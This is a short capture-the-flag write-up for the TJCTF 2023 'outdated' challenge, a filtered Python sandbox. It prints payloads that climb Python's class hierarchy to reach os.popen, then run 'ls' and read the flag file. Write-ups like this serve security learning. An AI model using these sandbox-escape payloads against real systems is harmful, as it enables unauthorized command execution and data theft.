CTFtime.org / TJCTF 2023 / outdated / Writeup

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/8c71c4bb-540a-47dd-9634-a5cae54556b2)

Some blacklisted items here but its essentially a SSTI sort of. I tried a basic payload.

`print(''.__class__.__mro__[1].__subclasses__())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/eb00a81f-7428-4cff-8683-3b7c88001e63)

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/da577c04-8ffc-4092-8475-3b53734cf0d2)

4th last item is my [favourite](https://blog.p6.is/Python-SSTI-exploitable-classes/#Using-os-wrap-close).

`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('ls').read())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/04537d2d-ec8a-4aae-910a-e967aadefb56)

`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('cat flag-cce1c56d-466d-4af9-8ae7-c7bcf99d5c49.txt').read())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/0590a762-f28d-4ba3-9789-b6cb9f8219db)

Flag: `tjctf{oops_bad_filter_3b582f74}`

Original writeup (https://jpalayoor.com/web/TJCTF-2023.html#outdated).

outdated

Comments

Sign in with